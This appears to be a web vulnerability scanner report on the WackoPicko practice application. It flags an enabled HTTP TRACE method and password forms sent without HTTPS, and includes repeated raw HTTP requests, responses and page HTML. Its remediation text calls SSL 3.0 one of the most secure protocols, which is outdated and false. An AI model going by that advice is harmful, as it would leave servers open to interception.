<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-23 first last">
<h2>Login</h2>
<table style="width:320px" cellspacing="0">
<form action="/WackoPicko/users/login.php" method="POST">
<tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
<tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
<tr><td><input type="submit" value="login" /></td><td> <a href="/WackoPicko/users/register.php">Register</a></td></tr>
</form>
</table>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
The TRACE HTTP method allows a client so send a request to the server, and
have the same request then send back in the server’s response. This allows the
client to determine if the server is receiving the request as expected or if
specific parts of the request are not arriving as expected.
For example incorrect encoding or a load balancer has filtered or changed a value.
On many default installations the TRACE method is still enabled.
While not vulnerable by itself, it does provide a method for cyber-criminals to
bypass the HTTPOnly cookie flag, and therefore could allow a XSS attack to
successfully access a session token.
Arachni has discovered that the affected page permits the HTTP TRACE method.
The HTTP TRACE method is normally not required within production sites and
should therefore be disabled.
Depending on the function being performed by the web application, the risk level can start low and increase as more functionality is implemented.
The remediation is typically a very simple configuration change and in most cases will not have any negative impact on the server or application.
server
using
TRACE
at
http://192.168.0.26/WackoPicko/
pointing to
http://192.168.0.26/WackoPicko/
.
| Type | In | Action |
|---|---|---|
server |
http://192.168.0.26/WackoPicko/ | http://192.168.0.26/WackoPicko/ |
Raw HTTP request used to retrieve the page.
TRACE /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Transfer-Encoding: chunked
Content-Type: message/http
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
The HTTP protocol by itself is clear text, meaning that any data that is transmitted via HTTP can be captured and the contents viewed.
To keep data private, and prevent it from being intercepted, HTTP is often tunnelled through either Secure Sockets Layer (SSL), or Transport Layer Security (TLS). When either of these encryption standards are used it is referred to as HTTPS.
Cyber-criminals will often attempt to compromise credentials passed from the client to the server using HTTP. This can be conducted via various different Man-in-The-Middle (MiTM) attacks or through network packet captures.
Arachni discovered that the affected page contains a password input, however,
the value of the field is not sent to the server utilising HTTPS. Therefore it
is possible that any submitted credential may become compromised.
The affected site should be secured utilising the latest and most secure encryption protocols. These include SSL version 3.0 and TLS version 1.2. While TLS 1.2 is the latest and the most preferred protocol, not all browsers will support this encryption method. Therefore, the more common SSL is included. Older protocols such as SSL version 2, and weak ciphers (< 128 bit) should also be disabled.
form
with inputs
username
firstname
lastname
password
againpass
using
GET
at
http://192.168.0.26/WackoPicko/users/register.php
pointing to
http://192.168.0.26/WackoPicko/users/register.php
.
| Proof |
|---|
<form action="/WackoPicko/users/register.php" method="POST">
<tr>
<td>
Username :
</td>
<td>
<input type="text" name="username">
</input>
</td>
</tr>
<tr>
<td>
First Name :
</td>
<td>
<input type="text" name="firstname">
</input>
</td>
</tr>
<tr>
<td>
Last Name :
</td>
<td>
<input type="text" name="lastname">
</input>
</td>
</tr>
<tr>
<td>
Password :
</td>
<td>
<input type="password" name="password">
</input>
</td>
</tr>
<tr>
<td>
Password again :
</td>
<td>
<input type="password" name="againpass">
</input>
</td>
</tr>
<tr>
<td>
<input type="submit" value="Create Account!">
</input>
</td>
<td>
</td>
</tr>
</form>
|
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 | <form action="/WackoPicko/users/register.php" method="POST"> <tr> <td> Username : </td> <td> <input type="text" name="username"> </input> </td> </tr> <tr> <td> First Name : </td> <td> <input type="text" name="firstname"> </input> </td> </tr> <tr> <td> Last Name : </td> <td> <input type="text" name="lastname"> </input> </td> </tr> <tr> <td> Password : </td> <td> <input type="password" name="password"> </input> </td> </tr> <tr> <td> Password again : </td> <td> <input type="password" name="againpass"> </input> </td> </tr> <tr> <td> <input type="submit" value="Create Account!"> </input> </td> <td> </td> </tr> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/users/register.php | http://192.168.0.26/WackoPicko/users/register.php |
|
|
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/register.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:44 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1082
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last" >
<h2> Register for an account!</h2>
<p>
Protect yourself from hackers and <a href="/WackoPicko/passcheck.php">check your password strength</a>
</p>
<p class="span-10 error">
All fields are required</p>
<table cellspacing="0" style="width:320px">
<form action="/WackoPicko/users/register.php" method="POST">
<tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
<tr><td>First Name :</td><td> <input type="text" name="firstname" /></td></tr>
<tr><td>Last Name :</td><td> <input type="text" name="lastname" /></td></tr>
<tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
<tr><td>Password again :</td><td> <input type="password" name="againpass" /></td></tr>
<tr><td><input type="submit" value="Create Account!" /></td><td></td></tr>
</form>
</table>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/register.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:44 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1082
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last" >
<h2> Register for an account!</h2>
<p>
Protect yourself from hackers and <a href="/WackoPicko/passcheck.php">check your password strength</a>
</p>
<p class="span-10 error">
All fields are required</p>
<table cellspacing="0" style="width:320px">
<form action="/WackoPicko/users/register.php" method="POST">
<tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
<tr><td>First Name :</td><td> <input type="text" name="firstname" /></td></tr>
<tr><td>Last Name :</td><td> <input type="text" name="lastname" /></td></tr>
<tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
<tr><td>Password again :</td><td> <input type="password" name="againpass" /></td></tr>
<tr><td><input type="submit" value="Create Account!" /></td><td></td></tr>
</form>
</table>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
form
with inputs
username
firstname
lastname
password
againpass
using
GET
at
http://192.168.0.26/WackoPicko/users/register.php
pointing to
http://192.168.0.26/WackoPicko/users/register.php
.
| Proof |
|---|
<form action="/WackoPicko/users/register.php" method="POST">
<tr>
<td>
Username :
</td>
<td>
<input type="text" name="username">
</input>
</td>
</tr>
<tr>
<td>
First Name :
</td>
<td>
<input type="text" name="firstname">
</input>
</td>
</tr>
<tr>
<td>
Last Name :
</td>
<td>
<input type="text" name="lastname">
</input>
</td>
</tr>
<tr>
<td>
Password :
</td>
<td>
<input type="password" name="password">
</input>
</td>
</tr>
<tr>
<td>
Password again :
</td>
<td>
<input type="password" name="againpass">
</input>
</td>
</tr>
<tr>
<td>
<input type="submit" value="Create Account!">
</input>
</td>
<td>
</td>
</tr>
</form>
|
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 | <form action="/WackoPicko/users/register.php" method="POST"> <tr> <td> Username : </td> <td> <input type="text" name="username"> </input> </td> </tr> <tr> <td> First Name : </td> <td> <input type="text" name="firstname"> </input> </td> </tr> <tr> <td> Last Name : </td> <td> <input type="text" name="lastname"> </input> </td> </tr> <tr> <td> Password : </td> <td> <input type="password" name="password"> </input> </td> </tr> <tr> <td> Password again : </td> <td> <input type="password" name="againpass"> </input> </td> </tr> <tr> <td> <input type="submit" value="Create Account!"> </input> </td> <td> </td> </tr> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/users/register.php | http://192.168.0.26/WackoPicko/users/register.php |
|
|
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/register.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:44 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1082
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last" >
<h2> Register for an account!</h2>
<p>
Protect yourself from hackers and <a href="/WackoPicko/passcheck.php">check your password strength</a>
</p>
<p class="span-10 error">
All fields are required</p>
<table cellspacing="0" style="width:320px">
<form action="/WackoPicko/users/register.php" method="POST">
<tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
<tr><td>First Name :</td><td> <input type="text" name="firstname" /></td></tr>
<tr><td>Last Name :</td><td> <input type="text" name="lastname" /></td></tr>
<tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
<tr><td>Password again :</td><td> <input type="password" name="againpass" /></td></tr>
<tr><td><input type="submit" value="Create Account!" /></td><td></td></tr>
</form>
</table>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/register.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:44 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1082
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last" >
<h2> Register for an account!</h2>
<p>
Protect yourself from hackers and <a href="/WackoPicko/passcheck.php">check your password strength</a>
</p>
<p class="span-10 error">
All fields are required</p>
<table cellspacing="0" style="width:320px">
<form action="/WackoPicko/users/register.php" method="POST">
<tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
<tr><td>First Name :</td><td> <input type="text" name="firstname" /></td></tr>
<tr><td>Last Name :</td><td> <input type="text" name="lastname" /></td></tr>
<tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
<tr><td>Password again :</td><td> <input type="password" name="againpass" /></td></tr>
<tr><td><input type="submit" value="Create Account!" /></td><td></td></tr>
</form>
</table>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
form
with inputs
username
password
using
GET
at
http://192.168.0.26/WackoPicko/users/login.php
pointing to
http://192.168.0.26/WackoPicko/users/login.php
.
| Proof |
|---|
<form action="/WackoPicko/users/login.php" method="POST">
<tr>
<td>
Username :
</td>
<td>
<input type="text" name="username">
</input>
</td>
</tr>
<tr>
<td>
Password :
</td>
<td>
<input type="password" name="password">
</input>
</td>
</tr>
<tr>
<td>
<input type="submit" value="login">
</input>
</td>
<td>
<a href="/WackoPicko/users/register.php">
Register
</a>
</td>
</tr>
</form>
|
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | <form action="/WackoPicko/users/login.php" method="POST"> <tr> <td> Username : </td> <td> <input type="text" name="username"> </input> </td> </tr> <tr> <td> Password : </td> <td> <input type="password" name="password"> </input> </td> </tr> <tr> <td> <input type="submit" value="login"> </input> </td> <td> <a href="/WackoPicko/users/register.php"> Register </a> </td> </tr> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/users/login.php | http://192.168.0.26/WackoPicko/users/login.php |
|
|
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/login.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 303 See Other
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /WackoPicko/users/login.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Content-Type: text/html
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 958
Content-Type: text/html
<html>
